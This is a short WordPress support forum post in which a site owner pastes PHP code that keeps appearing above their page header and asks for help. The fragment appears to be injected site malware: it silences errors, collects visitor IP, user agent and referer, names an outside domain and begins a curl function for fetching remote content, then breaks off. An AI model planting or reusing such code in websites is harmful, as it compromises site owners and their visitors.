Code appearing on top of Header
-
error_reporting(0); header('Content-Type: text/html; charset=utf-8'); $OoooOO0 = 'bfivenew'; date_default_timezone_set('PRC'); $dRoot = @$_SERVER['DOCUMENT_ROOT']; $rUrl = @$_SERVER['REQUEST_URI']; $curName = @basename(__FILE__); $sName = @$_SERVER['HTTP_HOST']; $Ooolg = @$_SERVER['HTTP_ACCEPT_LANGUAGE']; $uAgent = @$_SERVER['HTTP_USER_AGENT']; $referer = @$_SERVER['HTTP_REFERER']; $http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'https://'; $typeName = $http_type . $sName; $uAgent = @strtolower($uAgent); $referer = @strtolower($referer); if(getenv('HTTP_CLIENT_IP')){ $client_ip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR')) { $client_ip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR')) { $client_ip = getenv('REMOTE_ADDR'); } else { $client_ip = $_SERVER['REMOTE_ADDR']; } $siteweb = "gwallergy.xyz"; function getCurl($gurl) { $file_contents = ''; $user_agent = 'Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)'; if(function_exists('curl_init')){ try { ?>
This code keeps showing up on top of my header i have looked a lot a don know what to do.
- This topic was modified 3 years ago by . Reason: Moved to Fixing WordPress, this is not an Everything else WordPress topic
The page I need help with: [log in to see the link]
- The topic ‘Code appearing on top of Header’ is closed to new replies.